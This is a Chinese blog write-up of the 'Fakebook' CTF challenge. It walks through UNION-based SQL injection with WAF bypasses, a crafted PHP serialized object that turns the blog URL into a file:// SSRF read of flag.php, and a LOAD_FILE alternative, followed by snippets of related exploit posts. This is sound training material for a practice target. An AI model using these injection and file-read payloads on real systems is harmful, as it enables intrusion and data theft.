Fakebook---反序列化+sql注入+ssrf

已于 2022-01-29 13:28:00 修改
阅读量864 收藏 2
点赞数
文章标签: sql 数据库 database
于 2022-01-24 17:43:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q1415500189/article/details/122671235
版权

[网鼎杯 2018]Fakebook

在buuoj可以搜到

进入环境,常规用f12查看源码,看看有没有什么提示,但本人太菜了,实在找不到什么提示

进入,先注册一个账号,发现本题对bolg有审查,必须为真实可以进入的网址

点击username ,发现可以进入用户的页面

这个页面可以访问用户提供的博客网址,并显示,那么,我们思路就来了,我们是不是可以通过file协议来访问并显示靶机的文件,这就去试试

ps图片未显示网页信息是因为靶机的访问请求被我的浏览器给拦截了,所以没能显示我的博客,

但通过文字提示,可以知道,是存在显示功能的

咳咳,果然没那么简单,这里有waf

然后,我们还能发现view页面有get传参no,用于从数据库调取用户信息,是一个很明显的注入点

经过尝试,构造了payload1为

ps,这里union布置怎么被过滤了,在其后面多加一个空格即可绕过过滤

?no=-1 union  select 1,(select user()),1,1#

 在这里我们可以发现的信息

1.回显点在username处

2.使用了反序列化储存,在数据库中储存的age,blog都是通过序列化字符串储存的,

3.绝对路径为/var/www/html

综上,我们可以猜出flag大概率存在于html目录下

上御剑:

 成功发现flag.php

已经到了这里了,这道题可能跟返序列化有关,但反序列化一般需要知道源码的,也就是说这道题应该存在源码泄露,以此来构造我们的payload(序列化字符串),使blog输出为file:///var/www/html/flag.php即可

---------------------------------------------------

解法一

以我有限的渗透水平,我实在想不到怎么找到源码泄露

于是搜索大佬们的wp,发现在robots.txt里面有代码备份,

 QAQ,这就是我和dalao的差距啊,为啥他们一看源码,就能发现泄露啊TAT.

我们下载备份文件,

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

这正是我们需要的用户类的代码,通过源码,我们很容易构造出userinfo的序列化字符串,然后将blog换成file:///var/www/html/flag.php,如下

O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

所以接下来只要把这段字符串放在get接受的位置即可(加单引号包裹)

最后,回到我们的sql注入,

 输入

payload:?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

至于为何在4位点插入串,因为我们之前猜测ssrf的利用位置在blog--4位点,别的位置无法curl_exec()造成ssrf

f12发现flag。。。

解法二:

既然这个sql注入又回显

我们是不是可以使用sql注入load_file()利用报错的绝对路径直接查到flag.php

构造pyload

?no=-1 union  select 1,(SELECT LOAD_FILE('/var/www/html/flag.php') AS Result),3,4#

f12回显点,直接得到flag

总结,我要走的路还很长啊TAT

笵--
关注
JAVA代码审计(基础漏洞:SQL注入、XXE、XSS、反序列化、CSRF、文件上传、逻辑漏洞、SSRF、命令执行)
墨痕诉清风的博客
09-09 140
比如以下,只是判断referer的值是否为空,判断是否是www.testdomain.com开头,都是则继续执行,否则就返回首页,只要构造POC:www. testdomain.com.hacker.com。就可以绕过检测,造成CSRF漏洞。知道漏洞的原理,了解漏洞产生的原因,只要在审计的时候,重点关注这些原因,就很容易找到漏洞。攻击者盗用了用户的身份,以用户的名义发起恶意请求,服务器没有对身份进行识别,会认为这请求是用户发起,会根据请求进行响应 ,CSRF漏洞的本质就是通过欺骗用户去访问自己设置的地址。
CTF竞赛网络安全大赛(网鼎杯 )Web|sql注入java反序列化
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 1228
​ CTF竞赛网络安全大赛题目考点sql注入和java反序列化 网鼎杯解题思路 题目一打开是这样的界面 下载题目的附件,并用jd-gui.exe打开 核心代码如下 Test代码
[代码审计]帆软channel反序列化漏洞hsql链浅析利用
最新发布
LiangYueSec的博客
09-10 1127
[代码审计]帆软channel反序列化hsql浅析利用
ThinkPHP3.2.x (SQL注入&文件读取)反序列化POP链
LYJ20010728的博客
08-10 817
ThinkPHP3.2.x(SQL注入&文件读取)反序列化POP链初始配置漏洞利用漏洞分析POP链分析POP链构造漏洞利用参考文章 初始配置 这里利用ThinkPHP3.2.3做示例,戳此进行下载 php的版本采用PHP5 (PHP7下起的ThinkPHP框架在调用有参函数时不传参数会触发框架里的错误处理) 下载后的源码中,需要对Application/Home/Controller/IndexController.class.php内容进行修改 <?php namespace Hom
[原题复现][网鼎杯 2018] WEB Fakebook(SSRF、反序列化SQL注入)
笑花大王
02-27 2722
简介 原题复现: 考察知识点:SSRF、反序列化SQL注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 分析了整体结构 点击jion可以添加账号还有博客地址添加OK之后会有ifram把你的博客地址引用到当前页面 jion添加的信息点击进入发现了get注入点 注入进去没flag 不过在da...
【春秋云镜】CVE-2023-43291 反序列化字符串逃逸+sql注入
RisingFan的博客
04-24 476
emlog是一款轻量级博客及CMS建站系统,在emlog pro v.2.1.15及更早版本中的不受信任数据反序列化允许远程攻击者通过cache.php组件执行SQL语句。如果你是奔着找flag的思路,可以参考我下面的投机取巧,不过不建议这样干,这样其实对你学习这个漏洞,代码审计还是不太好,不建议这么干。先访问/admin看看,尝试了一波弱口令admin/admin123,成功登录。说实话已经写的很详细了,可参考复现,过程很清晰,还带着分析,很人性了。先搜了搜有关漏洞的细节,具体可参考。
php微信漏洞,wecenter 3.1.9 /app/m/weixin.php 反序列化造成SQL注入漏洞
weixin_36234738的博客
03-25 353
wecenter 3.1.9 /app/m/weixin.php 文件中,对传入的参数反序列化后直接构造SQL语句进行查询,导致SQL注入漏洞漏洞文件:/app/m/weixin.php:110相关代码public function authorization_action(){$this->model('account')->logout();unset(AWS_APP::sessi...
【攻防世界】十九 --- fakebook --- ssrf
qq_43168364的博客
12-29 574
题目 — fakebook 一、writeup 使用dirsearch扫描目录 flag应该在flag.txt文件中 访问robots.txt文件,得到了一个目录 下来了一个文件,user.php.bak。该文件先丢在这里等下再审计,主页没有任何发现,前端代码中没有提示,login.php 也没有找到可以利用的点(可以尝试:sql,xss,逻辑漏洞,写入日志文件,爆破) 来到join.php页面注册了一个admin用户 从首页可以访问到admin用户的页面,发现存在一个查询字符串,其有sql注入漏洞
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1443
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
SQL注入类型CTF题目总结
Lelouch_E的博客
11-25 1573
SQL注入类型CTF题union 注入buu Fakebookbuu Baby Sqli盲注buu Hack World报错注入buu hardsql其他buu BlackList union 注入 buu Fakebook 注册后扫描目录发现:/robots.txt 测试发现/view.php?no=1 参数存在SQL注入,但是union select被waf拦截了 尝试绕过 爆表名 /view.php?no=-1 union/**/select 1,group_concat(table_name),
BUUCTF Fakebook
venu_s的博客
03-24 326
Fakebook 1.题目 2.先随便注册一下,并查看网页源码,发现如下页面 3.判断注入点,发现?no=1存在注入 4.判断字段数,order by 长度为4(这里对空格进行了过滤,可以用++代替) ?no=0++order++by++4--+ 5.得到当前库名 ?no=0++union++select++1,database(),3,4--+ 6.得到表名 ?no=0++union...
攻防世界-web高手进阶区
zji
04-25 6648
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
py 读取sql文件_ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链
weixin_34297863的博客
01-26 319
ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链测试环境OS:MAC OSPHP:5.4.45ThinkPHP:3.2.3环境搭建直接在Web目录下Composer一把梭。composer create-project topthink/thinkphp=3.2.3 tp3然后访问首页框架会自动生成一个默认控制器,在默认控制器下添加一个测试用的Act...
网络安全学习阶段性总结:SQL注入|SSRF攻击|OS命令注入|身份验证漏洞|事物逻辑漏洞|目录遍历漏洞...
Zeker62的博客
08-21 567
目录SQL注入什么是SQL注入?掌握SQL注入之前需要了解的知识点SQL注入情况流程分析有完整的回显报错(最简单的情况)——检索数据:在HTTP报文中利用注释———危险操作检索隐藏数据:SQL注入导致逻辑漏洞SQL注入重点——盲注!通过触发条件响应来实现SQL盲注通过触发布尔错误实现SQL盲注——布尔盲注通过触发时间延迟实现SQL盲注——时延盲注通过OAST进行盲注——最终大招双注入SSRF 攻...
[原题复现+审计][网鼎杯 2018] WEB Fakebook(SSRF、反序列化SQL注入)
笑花大王
02-27 1305
简介 原题复现: 考察知识点:SSRF、反序列化SQL注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 分析了整体结构 点击jion可以添加账号还有博客地址添加OK之后会有ifram把你的博客地址引用到当前页面 jion添加的信息点击进入发现了get注入点 注入进去没flag 不过在da...
Linq to Sql 序列化和反序列化
lem's Blog
02-10 2166
public class Test { public List GetList(string str) { DataContractSerializer dcs = new DataContractSerializer(typeof(List)); XmlReader xr = XmlReader.C
sql server 加密更改必须序列化_什么是序列化、反序列化
weixin_39525097的博客
11-14 663
序列化和反序列化是相对的,你可以就将其理解为数据的的编码和解码过程。一种语言系统下的数据结构只有在当前这个系统下才能够识别运行;当数据需要跨语言跨系统传输时,必须将其转成一种中间结构,这个中间结构能被双方识别、还原,这个过程就是序列化和反序列化。 使用场景 通常有两个用途,存储和传输,其实都是转储(转储,由一存储介质转移到另一存储介质) 最常见的是将数据由内存存储到硬盘。数据或者对象在俩者之间的表...
记录一道题(sql注入+ssrf+文件上传)
Huamang的博客
02-13 389
拿到题目,学长给了hint,代码泄露,可以直接拿御剑扫,也可以在网站后面写/www.zip拿到源代码 看了题目后第一层有两个可能,一个是爆破进去,还有一个是sql注入,看源代码里有sql语句的拼接,而且爆破可能性太低,所以选择sql注入 sql注入 代码审计 function escape1($string){ $a = 1; $b = 2; global $link; $string = $link->real_escape_string($string);
SQL 处理序列化的方法
liangf05的专栏
06-24 5684
表 user 中字段area_data 存放该用户的省市区信息,序列户后字符串格式如下: a:2:{i:1;s:9:"安徽省";i:46;s:9:"芜湖市";} a:3:{i:14;s:9:"吉林省";i:198;s:24:"延边朝鲜族自治州";i:3039;s:9:"延吉市";} a:2:{i:18;s:18:"内蒙古自治区";i:238;s:15:"巴彦淖尔市";} a:3:{
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值